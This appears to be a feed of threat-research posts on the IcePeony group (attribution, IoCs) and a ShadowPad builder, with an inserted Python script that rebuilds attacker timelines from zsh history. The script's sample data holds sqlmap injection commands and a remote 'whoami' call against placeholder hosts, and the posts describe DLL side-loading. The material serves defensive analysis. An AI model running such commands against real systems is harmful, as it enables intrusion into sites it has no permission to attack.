IcePeony might be working under the 996 working hour system.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/20.png" alt="" /></p> <p><a href="https://en.wikipedia.org/wiki/996_working_hour_system">https://en.wikipedia.org/wiki/996_working_hour_system</a></p> <p>Next, there is a very simple clue to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here is an example from a wrapper script for the IceCache client. This suggests that IcePeony operates from a region where Simplified Chinese is commonly used.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/21.png" alt="" /></p> <p>IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorg; more specifically, IceCache contains a string referring to a project named reGeorgGo.</p> <p>Upon investigating reGeorgGo, we found that it was developed by a Chinese security engineer. There is no other information about this project on the internet aside from the developer’s blog, so it is not a well-known tool. The publicly available reGeorgGo takes only three arguments, whereas IceCache has many more commands added to it.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/22.png" alt="" /></p> <p><a href="https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo">https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo</a></p> <p>Let’s examine attribution from another angle. In this campaign, IcePeony targeted India, Mauritius, and Vietnam. Attacks on India and Vietnam are not uncommon, but what about Mauritius?</p> <p><img src="https://nao-sec.org/assets/2024-10-17/23.png" width="50%" /></p> <p>Mauritius is a small country in the Indian Ocean. Interestingly, Mauritius has recently deepened its cooperation with India. 
Both countries are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter it.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/24.png" alt="" /></p> <p><a href="https://www.mea.gov.in/newsdetail1.htm?12042/">https://www.mea.gov.in/newsdetail1.htm?12042/</a></p> <p>We summarize the attribution information using the Diamond Model.</p> <p>IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system.</p> <p>They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. The government and education sectors in Mauritius and Vietnam were also targeted.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/25.png" alt="" /></p> <h2 id="wrap-up">Wrap-Up</h2> <p>In this blog post, we introduced IcePeony, a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam.</p> <p>The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL injection attacks on publicly accessible web servers. If vulnerabilities are found, they install webshells or execute malware. Ultimately, they aim to steal credentials.</p> <p>We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. 
They remain active, and we must continue monitoring their activities closely moving forward.</p> <h2 id="iocs">IoCs</h2> <h3 id="ip">IP</h3> <ul> <li>165[.]22.211.62</li> <li>64[.]227.133.248</li> <li>173[.]208.156.19</li> <li>173[.]208.156.144</li> <li>154[.]213.17.225</li> <li>103[.]150.186.219</li> <li>63[.]141.255.16</li> <li>204[.]12.205.10</li> <li>107[.]148.37.63</li> <li>103[.]99.60.119</li> <li>154[.]213.17.237</li> <li>45[.]195.205.88</li> <li>154[.]213.17.244</li> <li>103[.]99.60.93</li> <li>149[.]115.231.17</li> <li>149[.]115.231.39</li> <li>103[.]99.60.108</li> </ul> <h3 id="domain">Domain</h3> <ul> <li>d45qomwkl[.]online</li> <li>k9ccin[.]com</li> <li>k8ccyn[.]com</li> <li>88k8cc[.]com</li> <li>googlesvn[.]com</li> </ul> <h3 id="icecache-1">IceCache</h3> <ul> <li>484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f</li> <li>5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811</li> <li>ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b</li> <li>e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b</li> <li>d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950</li> <li>11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63</li> <li>de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c</li> <li>b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681</li> <li>535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd</li> <li>0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd</li> <li>5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46</li> <li>3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c</li> <li>a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6</li> <li>0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77</li> </ul> <h3 id="iceevent-1">IceEvent</h3> <ul> <li>80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58</li> 
<li>9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e</li> <li>9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea</li> <li>bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b</li> </ul>
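The Intrusion Timeline and Attribution sections above both rest on one artefact: a zsh_history written with zsh’s EXTENDED_HISTORY option, which stores the start epoch and duration of every command. As an added example (not code from the original post or from nao_sec), the Python script below parses that format, rebuilds the timeline under a chosen UTC offset, and tabulates activity by hour and weekday, which is how an 8 a.m. to 10 p.m., Sunday-off, UTC+8 pattern becomes visible. The sample history, host names and the client.py file name are constructed; only the hPass alias comes from the post. Without EXTENDED_HISTORY the file holds commands but no timestamps, and the script marks such lines rather than guessing.

```python
"""Rebuild an attacker-side timeline from a zsh_history file.

zsh records timestamps only when the EXTENDED_HISTORY option is set
(Oh My Zsh enables it by default). Each entry then has the form

    : <epoch-start>:<elapsed-seconds>;<command>

A command that spans several lines is stored with a trailing backslash on
each line that is continued.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

ENTRY_RE = re.compile(r"^: (\d+):(\d+);(.*)$")
WEEKDAYS = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")

# Constructed sample, not the real IcePeony history. The epochs were chosen so
# that, read in UTC+8, they fall on Mon 2024-07-01 08:01, 09:00 and 22:00,
# Tue 2024-07-02 10:30 and Sat 2024-07-06 11:00, with nothing on Sunday.
# Host names and client.py are placeholders; hPass is the alias from the post.
SAMPLE_HISTORY = (
    ": 1719792060:0;sqlmap -u 'http://target.example/page?id=1' --batch\n"
    ": 1719795600:12;proxychains4 bash info.sh\n"
    ": 1719842400:0;python3 client.py -t 203.0.113.10 \\\n"
    "-c whoami\n"
    ": 1719887400:0;hPass\n"
    ": 1720234800:0;sqlmap -u 'http://other.example/list?cat=2' --dbs\n"
)


@dataclass
class Entry:
    epoch: int | None  # None if the file was written without EXTENDED_HISTORY
    elapsed: int       # seconds the command ran
    command: str


def parse_zsh_history(text: str) -> list[Entry]:
    """Parse raw file contents, joining backslash-continued multi-line commands."""
    entries: list[Entry] = []
    for raw in text.splitlines():
        if entries and entries[-1].command.endswith("\\"):
            # Continuation line: drop the backslash and keep the original newline.
            entries[-1].command = entries[-1].command[:-1] + "\n" + raw
            continue
        m = ENTRY_RE.match(raw)
        if m:
            entries.append(Entry(int(m.group(1)), int(m.group(2)), m.group(3)))
        elif raw.strip():
            entries.append(Entry(None, 0, raw))  # plain history line, no timestamp
    return entries


def to_local(epoch: int, utc_offset_hours: int) -> datetime:
    """Interpret a Unix timestamp in a candidate operator time zone."""
    return datetime.fromtimestamp(epoch, timezone(timedelta(hours=utc_offset_hours)))


def timeline(entries: list[Entry], utc_offset_hours: int) -> list[str]:
    """Chronological one-line-per-command view; undated entries are listed first."""
    ordered = sorted(entries, key=lambda e: (e.epoch is not None, e.epoch or 0))
    rows = []
    for e in ordered:
        if e.epoch is None:
            when = "(no timestamp)     "
        else:
            when = to_local(e.epoch, utc_offset_hours).strftime("%Y-%m-%d %H:%M:%S")
        rows.append(f"{when}  {e.command.splitlines()[0]}")
    return rows


def activity_by_hour(entries: list[Entry], utc_offset_hours: int) -> Counter:
    """Commands per local hour of day; a working-hours pattern shows up here."""
    return Counter(to_local(e.epoch, utc_offset_hours).hour
                   for e in entries if e.epoch is not None)


def activity_by_weekday(entries: list[Entry], utc_offset_hours: int) -> Counter:
    """Commands per local weekday; a day off shows up as a zero."""
    counts = Counter({day: 0 for day in WEEKDAYS})
    for e in entries:
        if e.epoch is not None:
            counts[WEEKDAYS[to_local(e.epoch, utc_offset_hours).weekday()]] += 1
    return counts


def working_window(entries: list[Entry], utc_offset_hours: int) -> tuple[int, int]:
    """Earliest and latest local hour with activity, e.g. (8, 22) for 8 a.m. to 10 p.m."""
    hours = activity_by_hour(entries, utc_offset_hours)
    return min(hours), max(hours)


if __name__ == "__main__":
    history = parse_zsh_history(SAMPLE_HISTORY)
    for offset in (0, 8):
        print(f"--- assuming UTC{offset:+d} ---")
        print("\n".join(timeline(history, offset)))
        print("hours active:", working_window(history, offset))
        print("by weekday:", dict(activity_by_weekday(history, offset)))
```

Run it against a real file with parse_zsh_history(open(path).read()) and try several offsets: the offset under which the first command of each day lands at a plausible start of a working day is the one worth reporting, and the weekday table should be checked against public holidays in the candidate region before drawing conclusions. Note that the elapsed field is only accurate for commands that ran in the foreground; a long-running background job records the time until the shell returned to the prompt.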
  54. Building Casper’s Shadow

    Sun, 30 Jun 2024 15:00:00 -0000

    Introduction

    A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021. ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well. We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights. Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us.

    [Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world.

    Background

    In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023. https://x.com/nao_sec/status/1648960199938707456

    This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. As a result, a CobaltStrike beacon was executed. The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick [1][2]. Our friend @aRtAGGI conducted similar analyses at the time. https://x.com/aRtAGGI/status/1649184131090087938

    After searching our past database, we later found that a similar attack had been carried out against Kazakhstan. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon. Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF [3][4]. We have identified these as U-4. If you are interested, please refer to the IoC sheet. https://nao-sec.org/jsac2020_ioc.html

    Let’s return to the present. To investigate recent attack samples, we executed a search query based on the characteristics of the loader used in the attack on Kyrgyzstan:

    exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2

    We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder.

    CasperVMakerHTTPx86
    MD5: eb99580e0d90ee61b3e2e3bd8715c633
    SHA-1: 706482eda6d747ca2688cdfd97399f800da9e73c
    SHA-256: b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6

    When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings: First, Install, Inject, Online, Proxy, DNS. These items are very similar to the reported architecture of ShadowPad [5]. This suggests that these tabs are configuration items for each module. The settings for each item are as follows:

    Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. If the build is successful, an EXE file and a DLL file are created. The EXE file is a legitimate AppLaunch.exe. It loads the mscoree.dll in the same directory via DLL side-loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally.

    Comparison with Similar Samples

    ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants. There are many samples with similar characteristics, but we will introduce two of them.

    Sample-1: According to Macnica’s report [2], Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same.

    Sample-2: A report released by the FBI in December 2021 [6] described an attack exploiting CVE-2021-44515 in which ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad. Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. Although API hashing is not used, it is a highly similar sample.

    ShadowPad Community

    As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 2021 [5], ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training) [7]. As various researchers have reported [2][5][6][8]–[38], many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick. As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT41 [39], Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD. In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is largely because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions from this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? ShadowPad and the RoyalRoad RTF Weaponizer may be shared through the same channels.

    Conclusion

    In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad. We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you.

    Acknowledgments

    We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you.
    References

    [1] TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf
    [2] Macnica, “The Reality of Targeted Attacks and Countermeasure Approaches, 5th Edition: Trends in Cyber Espionage Targeting Japan, FY2020” (マクニカ, 標的型攻撃の実態と対策アプローチ 第5版 日本を狙うサイバーエスピオナージの動向 2020年度), https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf
    [3] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
    [4] nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html
    [5] SentinelOne, “ShadowPad: A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/
    [6] FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf
    [7] HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/
    [8] Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/
    [9] Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/
    [10] ESET, “Connecting the dots: Exposing the arsenal and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/
    [11] ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
    [12] Macnica, “The Reality of Targeted Attacks and Countermeasure Approaches, 4th Edition: Trends in Cyber Espionage Targeting Japan, Second Half of FY2019” (マクニカ, 標的型攻撃の実態と対策アプローチ 第4版 日本を狙うサイバーエスピオナージの動向 2019年度下期), https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf
    [13] PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs
    [14] CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/
    [15] Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/
    [16] Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf
    [17] Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage
    [18] Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf
    [19] TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf
    [20] ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
    [21] Positive Technologies, “Higaisa or Winnti? APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
    [22] Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
    [23] Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan
    [24] TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf
    [25] Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis
    [26] Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf
    [27] SentinelOne, “Moshen Dragon’s Triad-and-Error Approach: Abusing Security Software to Sideload PlugX and ShadowPad”, https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/
    [28] TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf
    [29] Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/
    [30] Kaspersky, “Attacks on industrial control systems using ShadowPad”, https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/
    [31] ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/
    [32] Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns
    [33] Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor
    [34] TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html
    [35] Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf
    [36] Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks
    [37] Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/
    [38] TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html
    [39] United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer
    <p><img src="https://nao-sec.org/assets/2024-07-01/top.png" alt="" /></p> <h2 id="introduction">Introduction</h2> <p>A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021.</p> <p>ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well.</p> <p>We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights.</p> <p>Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us.</p> <p>[Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world.</p> <h2 id="background">Background</h2> <p>In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/1.png" alt="" /></p> <p><a href="https://x.com/nao_sec/status/1648960199938707456">https://x.com/nao_sec/status/1648960199938707456</a></p> <p>This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. 
As a result, a CobaltStrike beacon was executed.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/2.png" alt="" /></p> <p>The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup><sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. Our friend @aRtAGGI conducted similar analyses at the time.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/3.png" alt="" /></p> <p><a href="https://x.com/aRtAGGI/status/1649184131090087938">https://x.com/aRtAGGI/status/1649184131090087938</a></p> <p>We later found that a similar attack had been carried out against Kazakhstan after searching our past database. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon.</p> <p>Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup><sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>. We have identified these as <code class="language-plaintext highlighter-rouge">U-4</code>. If you are interested, please refer to the IoC sheet.</p> <p><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></p> <p>Let’s return to the present. 
To investigate recent attack samples, we executed a search query based on the characteristics of the loader used in the attack on Kyrgyzstan.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2 </code></pre></div></div> <p>We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder.</p> <h2 id="caspervmakerhttpx86">CasperVMakerHTTPx86</h2> <table> <tbody> <tr> <td>MD5</td> <td>eb99580e0d90ee61b3e2e3bd8715c633</td> </tr> <tr> <td>SHA-1</td> <td>706482eda6d747ca2688cdfd97399f800da9e73c</td> </tr> <tr> <td>SHA-256</td> <td>b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6</td> </tr> </tbody> </table> <p><img src="https://nao-sec.org/assets/2024-07-01/5.png" alt="" /></p> <p>When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings.</p> <ul> <li>First</li> <li>Install</li> <li>Inject</li> <li>Online</li> <li>Proxy</li> <li>DNS</li> </ul> <p>These items are very similar to the reported architecture of ShadowPad<sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup>. This suggests that these tabs are configuration items for each module. The settings for each item are as follows:</p> <p><img src="https://nao-sec.org/assets/2024-07-01/6.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/7.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/8.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/9.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-07-01/10.png" alt="" /></p> <p>Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. 
If the build is successful, an EXE file and a DLL file are created.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/11.png" alt="" /></p> <p>The EXE file is a legitimate AppLaunch. It loads the mscoree.dll in the same directory via DLL Side-Loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/12.png" alt="" /></p> <h2 id="comparison-with-similar-samples">Comparison with Similar Samples</h2> <p>ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/13.png" alt="" /></p> <p>There are many samples with similar characteristics, but we will introduce two of them.</p> <h3 id="sample-1">Sample-1</h3> <p>According to Macnica’s report<sup id="fnref:2:1" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>, Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/14.png" alt="" /></p> <h3 id="sample-2">Sample-2</h3> <p>A report released by the FBI in December 2021<sup id="fnref:6" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">6</a></sup> reported an attack exploiting CVE-2021-44515 where ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad.</p> <p>Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. 
Although API Hashing is not used, it is a highly similar sample.</p> <p><img src="https://nao-sec.org/assets/2024-07-01/15.png" alt="" /></p> <h2 id="shadowpad-community">ShadowPad Community</h2> <p>As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 2021<sup id="fnref:5:1" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup>, ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training)<sup id="fnref:7" role="doc-noteref"><a href="#fn:7" class="footnote" rel="footnote">7</a></sup>.</p> <p>As various researchers have reported<sup id="fnref:2:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup><sup id="fnref:5:2" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup><sup id="fnref:6:1" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">6</a></sup><sup id="fnref:8" role="doc-noteref"><a href="#fn:8" class="footnote" rel="footnote">8</a></sup><sup id="fnref:9" role="doc-noteref"><a href="#fn:9" class="footnote" rel="footnote">9</a></sup><sup id="fnref:10" role="doc-noteref"><a href="#fn:10" class="footnote" rel="footnote">10</a></sup><sup id="fnref:11" role="doc-noteref"><a href="#fn:11" class="footnote" rel="footnote">11</a></sup><sup id="fnref:12" role="doc-noteref"><a href="#fn:12" class="footnote" rel="footnote">12</a></sup><sup id="fnref:13" role="doc-noteref"><a href="#fn:13" class="footnote" rel="footnote">13</a></sup><sup id="fnref:14" role="doc-noteref"><a href="#fn:14" class="footnote" rel="footnote">14</a></sup><sup id="fnref:15" role="doc-noteref"><a href="#fn:15" class="footnote" rel="footnote">15</a></sup><sup id="fnref:16" role="doc-noteref"><a href="#fn:16" class="footnote" rel="footnote">16</a></sup><sup 
